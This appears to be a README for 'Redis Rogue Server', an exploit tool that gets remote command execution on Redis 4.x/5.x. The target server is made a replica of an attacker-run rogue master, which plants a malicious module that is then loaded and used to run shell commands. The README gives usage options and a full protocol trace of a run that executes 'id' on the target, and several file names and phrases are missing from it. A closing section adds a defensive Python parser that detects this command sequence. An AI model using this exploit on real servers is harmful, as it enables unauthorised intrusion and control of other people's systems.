Getting a shell via Redis 4.x/5.x master/slave mode
Latest commit f5ed472 Jul 11, 2019

Redis Rogue Server

Forking and refactoring from

An exploit for Redis (<=5.0.5) RCE, inspired by Redis post-exploitation.


Python 3.x


Compile exploit:

cd RedisModulesSDK/exp/

Then, is in RedisModulesSDK/


➜ python -h

usage: [-h] -r RHOST [-p RPORT] -L LHOST [-P LPORT] [-f FILE]
                       [-c COMMAND] [-a AUTH] [-v]

Redis 4.x/5.x RCE with RedisModules

optional arguments:
  -h, --help            show this help message and exit
  -r RHOST, --rhost RHOST
                        target host
  -p RPORT, --rport RPORT
                        target redis port, default 6379
  -L LHOST, --lhost LHOST
                        rogue server ip
  -P LPORT, --lport LPORT
                        rogue server listen port, default 21000
  -f FILE, --file FILE  RedisModules to load, default
  -c COMMAND, --command COMMAND
                        Command that you want to execute
  -a AUTH, --auth AUTH  redis password

Execute command:

➜ python -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/ -c "id"

>> send data: b'*3\r\n$7\r\nSLAVEOF\r\n$13\r\n*.*.*.*\r\n$4\r\n8888\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\\r\n'
>> receive data: b'+OK\r\n'
>> receive data: b'PING\r\n'
>> receive data: b'REPLCONF listening-port 6379\r\n'
>> receive data: b'REPLCONF capa eof capa psync2\r\n'
>> receive data: b'PSYNC 7cce9210b3ad3f54043ce1965cda506bd26b0224 1\r\n'
>> send data: b'*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$8\r\ndump.rdb\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*2\r\n$11\r\nsystem.exec\r\n$2\r\nid\r\n'
>> receive data: b'$49\r\n\x08uid=999(redis) gid=999(redis) groups=999(redis)\n\r\n'
uid=999(redis) gid=999(redis) groups=999(redis)

>> send data: b'*3\r\n$6\r\nMODULE\r\n$6\r\nUNLOAD\r\n$6\r\nsystem\r\n'
>> receive data: b'+OK\r\n'
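
The command sequence in the trace above can be recognised on the wire by a defender. The following is an added example, not code from this repository: it parses client-to-server RESP traffic and flags replication pointed at an unapproved master and a MODULE LOAD of the file named by the preceding CONFIG SET dbfilename. The function names, the sample bytes, the address 192.0.2.10 and the file name xyz.so are constructed for illustration, and treating the loaded module as the file replication just wrote is this example's assumption.

```python
import posixpath

# Constructed sample of client->server traffic, modelled on the trace above.
# 192.0.2.10 (documentation range) and xyz.so are placeholders, not page values.
SAMPLE = (
    b"*3\r\n$7\r\nSLAVEOF\r\n$10\r\n192.0.2.10\r\n$4\r\n8888\r\n"
    b"*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nxyz.so\r\n"
    b"*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./xyz.so\r\n"
    b"*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n"
)

def parse_resp_commands(buf):
    """Split concatenated RESP arrays of bulk strings into argument lists."""
    cmds, pos = [], 0
    while pos < len(buf):
        pos, count = _header(buf, pos, b"*")
        args = []
        for _ in range(count):
            pos, size = _header(buf, pos, b"$")
            if buf[pos + size:pos + size + 2] != b"\r\n":
                raise ValueError("bulk string length does not match payload")
            args.append(buf[pos:pos + size].decode("latin-1"))
            pos += size + 2
        if args:
            cmds.append(args)
    return cmds

def _header(buf, pos, marker):
    """Read '<marker><int>CRLF' at pos; return (offset after it, int)."""
    end = buf.find(b"\r\n", pos)
    if buf[pos:pos + 1] != marker or end < 0:
        raise ValueError("malformed RESP at offset %d" % pos)
    return end + 2, int(buf[pos + 1:end])

def suspicious_events(cmds, approved_masters=()):
    """Flag replication to an unapproved host and module loads of the RDB file."""
    events, rdb_name = [], None
    for args in cmds:
        verb, rest = args[0].upper(), args[1:]
        if verb in ("SLAVEOF", "REPLICAOF") and len(rest) == 2:
            if rest[0].upper() != "NO" and rest[0] not in approved_masters:
                events.append(("unapproved-master", rest[0] + ":" + rest[1]))
        elif verb == "CONFIG" and len(rest) == 3 and rest[0].upper() == "SET":
            if rest[1].lower() == "dbfilename":
                rdb_name = rest[2]  # remember where the next full sync is written
        elif verb == "MODULE" and len(rest) >= 2 and rest[0].upper() == "LOAD":
            from_rdb = posixpath.basename(rest[1]) == rdb_name
            events.append(("module-load-of-rdb-file" if from_rdb else "module-load", rest[1]))
    return events
```

The parser rejects frames whose declared bulk length does not match the payload, so redacted captures such as the first line of the trace above have to be reassembled from the raw bytes before they can be checked.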


